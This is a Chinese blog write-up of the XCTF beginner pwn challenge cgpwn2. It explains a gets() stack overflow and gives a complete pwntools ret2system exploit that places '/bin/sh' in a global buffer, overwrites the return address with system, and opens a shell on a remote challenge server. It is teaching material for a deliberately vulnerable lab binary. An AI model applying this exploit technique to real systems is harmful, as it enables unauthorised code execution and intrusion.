攻防世界新手区cgpwn2

字数:457字 | 预计阅读时长:1分钟

[攻防世界]新手区cgpwn2

依旧,先看文件属性信息,得知是个32位程序,且只开了NX
checksec查看信息
拖进32位IDA,先看字符串窗口,找有无可利用的字符串。


只找到了system,没有cat flag或者/bin/sh等字符串,再结合题目描述的提示“菜鸡认为自己需要一个字符串”,猜测需要自己输入一个/bin/sh,然后把它当参数传system函数里,拿到shell。
然后看伪代码,找漏洞,main里没什么可疑的,但是调用了一个hello函数,点进去看看

发现了一个会导致溢出的gets
运行程序发现是让我们输入两次,第一次输入名字,第二次gets了你留下的讯息。

思路:

  1. 由于只开启了NX,那么name的地址是不变的,记下name地址,输入’/bin/sh’到name里
  2. 利用gets溢出,覆盖返回地址为system的函数地址
  3. 把name作为参数传给system,构成system(“/bin/sh”)
  4. ls看文件,cat flag拿到flag

    EXP:

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
elf = ELF('./cgpwn2')
sys_addr = elf.symbols['system'] #获取system函数地址
binsh_addr = 0x0804A080 #name的地址

payload = 'a'*42 + p32(sys_addr) + p32(0xaaaa) + p32(binsh_addr)

p = remote('111.198.29.45',34484)
p.sendlineafter('name','/bin/sh')
p.sendlineafter('here',payload)
p.interactive()

payload解释:

  1. ‘a’*42:看栈可知s距离ebp有0x26,十进制即为38,再加上需要覆盖的ebp长度,由于是32位程序,所以ebp长度0x4,所以总共需要填充’a’*(38+4)

  2. p32(sys_addr):system函数的地址
  3. p32(0xaaaa):用于填充system函数的返回地址,由于system(“/bin/sh”)后直接拿到shell,所以随便填个返回地址就行
  4. p32(binsh_addr):name的地址,因为name的值就是’/bin/sh’,所以用它作为system的参数

可以不用/bin/sh,在name输入的时候用cat flag也可以直接拿到flag

好活儿,当赏!

微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br>力拔山兮气盖世<br>时不利兮骓不逝
/* */